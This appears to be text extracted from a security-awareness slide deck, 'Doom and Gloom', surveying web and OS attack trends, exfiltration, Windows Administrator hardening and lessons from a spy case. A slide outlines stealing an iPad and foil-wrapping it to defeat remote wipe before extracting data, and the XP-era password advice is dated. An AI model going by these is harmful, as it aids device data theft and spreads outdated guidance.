Doom and Gloom Dave Packham
Operating systems continue to have fewer remotely-exploitable vulnerabilities that lead to massive Internet worms.
Web Application Attacks • There appear to be two main avenues for exploiting and compromising web servers: brute force password guessing attacks and web application attacks. • Microsoft SQL, FTP, and SSH servers are popular targets for password guessing attacks because of the access that is gained if a valid username/password pair is identified. • SQL Injection, Cross-site Scripting and PHP File Include attacks continue to be the three most popular techniques used for compromising web sites. • Automated tools, designed to target custom web application vulnerabilities, make it easy to discover and infect several thousand web sites
Patch people…… • Attacks on Microsoft Windows operating systems were dominated by Conficker/ Downadup worm variants. • For the past six months, over 90% of the attacks recorded for Microsoft targeted the buffer overflow vulnerability described in the Microsoft Security Bulletin MS08-067. • Although in much smaller proportion, Sasser and Blaster, the infamous worms from 2003 and 2004, continue to infect many networks
Apple: QuickTime and Six More • Apple has released patches for many vulnerabilities in QuickTime over the past year. • QuickTime vulnerabilities account for most of the attacks that are being launched against Apple software. • Note that QuickTime runs on both Mac and Windows Operating Systems. • The following vulnerabilities should be patched for any QuickTime installations: CVE-2009-0007, CVE-2009-0003, CVE-2009-0957
Origin and Destination Analysis • Over the past six months, we have seen some very interesting trends when comparing the country where various attacks originate to the country of the attack destination. • The analysis performed for this report identified these attack categories as high-risk threats to most if not all networks, and as such, should be at the forefront of security practitioners' minds. • These categories are Server-Side HTTP attacks, Client-Side HTTP attacks, PHP Remote File Include, Cross-site Scripting attacks, and finally SQL Injection attacks.
The Meatspace Attack • SEU problem == id10t errors
From Wikipedia, the free encyclopedia • Meatspacerefers to real life or the physical world, and is conceived as the opposite of cyberspace or virtuality. • The term entered the Oxford English Dictionary in 2000
Change of focus • Attackers have long picked up on this opportunity and have switched to different types of attacks in order to take advantage of these vulnerabilities, using social engineering techniques to lure end-users into opening documents received by e-mail or by infecting websites with links to documents that have attacks for these vulnerabilities embedded. • These infected documents are not only placed on popular web sites that have a large number of visitors, but increasingly target the "long-tail", the thousands of specialized websites that have smaller but very faithful audiences. • By identifying and exploiting vulnerabilities in the Content Management Systems used by these sites, attackers can automate the infection process and reach thousands of sites in a matter of hours. Attacks using PDF vulnerabilities have seen a large increase in late 2008 and 2009 as it became clear to attackers how easy it is to use this method of getting control over a machine.
Steps 6 and 7: Exfiltration • In Step 6, with full domain administrator privileges, the attacker now compromises a server machine that stores secrets for the organization. In Step 7, the attacker exfiltrates this sensitive information, consisting of over 200 Megabytes of data. The attacker pushes this data out to the Internet from the server, again using HTTPS to encrypt the information, minimizing the chance of it being detected.
#1 Disable It • The built-in Administrator is basically a setup and disaster recovery account. You should use it during setup and to join the machine to the domain. After that you should never use it again, so disable it. Should you need to use the recovery console or boot into safe mode, the account will be magically re-enabled for use only in those troubleshooting tools. Once you boot the system again normally, it is disabled.
#2 Set a Unique Password • If the account is disabled, what does it matter what the password is? • Well, it matters if the account is not disabled on every system. How many unique passwords are used on the built-in administrator accounts across all systems in your environment? • If the answer is less than the number of systems in your environment, you have a problem. • If only one of those systems is compromised, the bad guy can dump out the password hashes and he’ll then have all he needs to authenticate to all the other systems. • (Note that it does not matter how strong the password is here; if the bad guy has hashes, password strength is irrelevant.)
#3 Set a Very Long Password, or None at All • Obviously a really long password is a good idea, • In certain situations, a blank one may be even better. • In an environment where you can guarantee physical security, you do not need to use the account across the network, and you are using Windows XP or Windows Server™ 2003, a blank password is better than a weak password. By default, blank passwords can only be used locally in Windows XP and Windows Server 2003. • If the account password is blank, the account is not valid as a network credential. Of course, if you have more than one administrator, it leaves you open to abuse and accountability issues, so you need to carefully consider this approach. • If you need to be concerned with those problems, set a very long password—127 characters or so. That way the account is as good as disabled.
Don’t Rename It • You will find many resources that recommend renaming the account and then creating a honey-pot account called Administrator to lure attackers. • No attacker worth his salt will be fooled by those tactics. The RID for the account is always 500. • There are abundant tools that can find the real account. Besides, don’t you have enough to do securing your network without building things that people should be breaking into? • Your time will be better spent on network security.
Hacking the iPad/iPhone • Easy peasy
Pull data • Public and private keys stored ON the device. • Steal device. • Cover in foil • Remote whipe sent? Bazinga!!! • Cable in bottom. Data pulled with command sent to os with itunes remote commands
Hacks? • Tiny chip players carry that they can throw into the goal to fool detectors.
Lesson 1: Encrypt your Wifi • On Monday, a number of Russian nationals got arrested for espionage against the US. • With all the talk and attention paid to cyber spies, spear phishing, APT and new high tech satellites and drones, it is almost refreshing to see that good old fashioned human spies are still used and apparently found valuable. • Skynethasn't taken over quite yet. • However, the story has a few neat cyber security lessons.
Lesson 2: Keep your password secure • The FBI followed these spies for a while already. • A few years back, the FBI secretly searched the homes of some of the spies, copying various hard disks in the process. Small problem: • The hard disk was encrypted. Luckily, an observant FBI agent noted a piece of paper during the search with a long number / letter combination. • Turned out it was the password. • This turned out to be critical as it allowed the agents to not only decrypt the hard disk, but after decrypting the hard disk the agents found steganography software and other encryption tools, as well as lists of web sites used to exchange stenographic messages.
Lesson 3: Obscurity != Security • The spies to some extent used steganography to exchange messages. • These messages where encoded into an image, and then uploaded to various web sites. • As explained above, the FBI was able to obtain a list of these sites and the software used to encode them. However, at least according to some reports, the messages were not encrypted. • Typically, if you want to do steganography right, first encrypt the message, then encode it in an image. In particular if you use standard software to perform your steganography.
Lesson 4: Perfect forward security • Perfect forward security is an important cryptographic concept. • You never want to use an old password to encrypt the new password. If you do, once an attacker figured out one password, they will be able to decrypt all future passwords. • It appears that the spies frequently made arrangements about future meetings and communication protocols over insecure channels (like the ad-hoc wifi). In some ways this may also be considered as relying on obscurity again.